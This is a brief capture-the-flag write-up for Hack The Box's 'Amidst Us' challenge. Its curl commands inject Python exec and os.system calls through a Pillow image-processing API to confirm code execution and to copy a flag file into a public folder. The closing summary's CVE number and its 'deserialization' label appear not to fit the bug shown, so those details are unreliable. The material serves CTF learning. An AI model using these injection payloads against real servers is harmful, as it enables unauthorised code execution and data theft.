HackTheBox Amidst Us Challenge
Explore the basics of cybersecurity in the Amidst Us Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/325
Description
The Amidst-Us tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?
Exploitation
https://security.snyk.io/vuln/SNYK-PYTHON-PILLOW-2331901
check
1
time curl 94.237.53.146:46950/api/alphafy -d '{"background":["exec(\"import os; os.system(\\\"sleep 5\\\")\")",255,255],"image":"'$(base64 challenge/application/static/images/arrow.png)'"}' -H 'Content-Type: application/json'
exploit
1
2
3
curl 94.237.53.146:46950/api/alphafy \
-H 'Content-Type: application/json' \
-d "{\"background\":[\"exec('import os;os.system(\\\\'cat /flag.txt > /app/application/static/flag.txt\\\\')')\",0,0],\"image\":\"iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==\"}"
1
curl 94.237.53.146:46950/static/flag.txt
Summary
The Amidst Us Challenge on Hack The Box is an easy-level web challenge that exploits Remote Code Execution (RCE) in a Python-based API. Participants leverage a known vulnerability in the Pillow library (CVE-2022-24303) to inject and execute arbitrary Python code via the API’s image-processing functionality. By crafting a malicious JSON payload, they execute system commands to extract the flag from the server. The challenge highlights the dangers of insecure deserialization and untrusted input execution, emphasizing the importance of patching vulnerable dependencies to mitigate RCE risks.